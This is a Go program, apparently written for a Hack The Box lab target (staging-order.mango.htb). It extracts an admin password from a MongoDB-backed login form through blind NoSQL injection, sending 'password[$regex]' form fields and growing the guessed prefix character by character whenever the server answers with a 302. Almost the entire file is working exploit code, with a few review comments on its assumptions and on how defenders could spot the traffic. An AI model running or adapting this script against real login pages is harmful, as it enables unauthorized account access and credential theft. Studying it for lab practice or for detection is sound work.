Bruteforce MongoDB Credentials with Regex Match Payload
package main | |
import (
	"fmt"
	"net/http"
	"net/url"
	"strings"
	"time"
)
// buildPrintable returns the candidate alphabet used for the sweep: the digits,
// then upper-case letters, then lower-case letters, followed by a fixed run of
// 17 punctuation characters. Order is significant because callers iterate it in
// sequence. The punctuation run is taken verbatim from the original ('>' and '@'
// both appear twice) and is handed to callers unescaped even though several of
// the characters carry regex meaning.
func buildPrintable() []rune {
	const special = "~>][<>!@#%^()@_{}"
	out := make([]rune, 0, 10+26+26+len(special))
	// addRange appends every rune in the inclusive interval [lo, hi].
	addRange := func(lo, hi rune) {
		for r := lo; r <= hi; r++ {
			out = append(out, r)
		}
	}
	addRange('0', '9')
	addRange('A', 'Z')
	addRange('a', 'z')
	out = append(out, []rune(special)...)
	return out
}
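// makePostRequest posts data as an application/x-www-form-urlencoded body to
// the fixed target URL and returns the status code of the first response.
//
// Redirects are not followed (CheckRedirect returns http.ErrUseLastResponse),
// so a 3xx comes back as-is instead of being resolved to the final page. Both
// the request-construction error and the transport error are fatal: the caller
// cannot tell "no answer" from "no match", so the original panic-on-error
// behaviour is kept rather than returning 0 and silently skewing the sweep.
func makePostRequest(data string) int {
	const target = "http://staging-order.mango.htb"
	req, err := http.NewRequest("POST", target, strings.NewReader(data))
	if err != nil {
		// Previously unchecked; a nil req would have crashed on Header.Set below anyway.
		panic(err)
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	client := &http.Client{
		// Without a deadline a single stalled connection blocks the sweep forever.
		// 30s is an arbitrary bound chosen for this review, not a tuned value.
		Timeout: 30 * time.Second,
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()
	return resp.StatusCode
}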
// buildPostData encodes the login form for victim, but instead of a plain
// password field it sends the bracketed key "password[$regex]" whose value is
// payload followed by ".*". The result is url.Values.Encode output, so keys are
// emitted in sorted order and bracket/dollar characters are percent-encoded.
//
// The request shape relies on the server decoding bracketed form keys into a
// nested object and passing it to the MongoDB query unchanged; a backend that
// coerces form fields to scalars, or rejects keys starting with '$', would not
// honour it. NOTE(review): that server-side behaviour is inferred from the
// payload shape, not from anything visible in this file.
func buildPostData(victim, payload string) string {
	form := make(url.Values, 2)
	form["username"] = []string{victim}
	form["password[$regex]"] = []string{payload + ".*"}
	return form.Encode()
}
// main sweeps the alphabet from buildPrintable one position at a time, treating
// a 302 from makePostRequest as "the regex matched" and extending the known
// prefix. Every starting character is tried in turn, the sweep never stops
// early, and each confirmed prefix is printed as soon as it is found.
//
// NOTE(review): why 302 means a match is not established here — presumably a
// post-login redirect; confirm against the target. From a monitoring
// standpoint the traffic is one POST per alphabet character per confirmed
// position, all to the same login endpoint with "$regex" in the body, which is
// a simple pattern to alert on server-side.
func main() {
	alphabet := buildPrintable()
	victim := "admin"
	fmt.Printf("[*] Bruteforcing password for: %s\n", victim)
	for _, first := range alphabet {
		known := string(first)
		// Keep sweeping while the previous pass managed to extend known.
		for extended := true; extended; {
			extended = false
			for _, next := range alphabet {
				candidate := known + string(next)
				if makePostRequest(buildPostData(victim, candidate)) != 302 {
					continue
				}
				fmt.Println(candidate)
				known = candidate
				extended = true
			}
		}
	}
}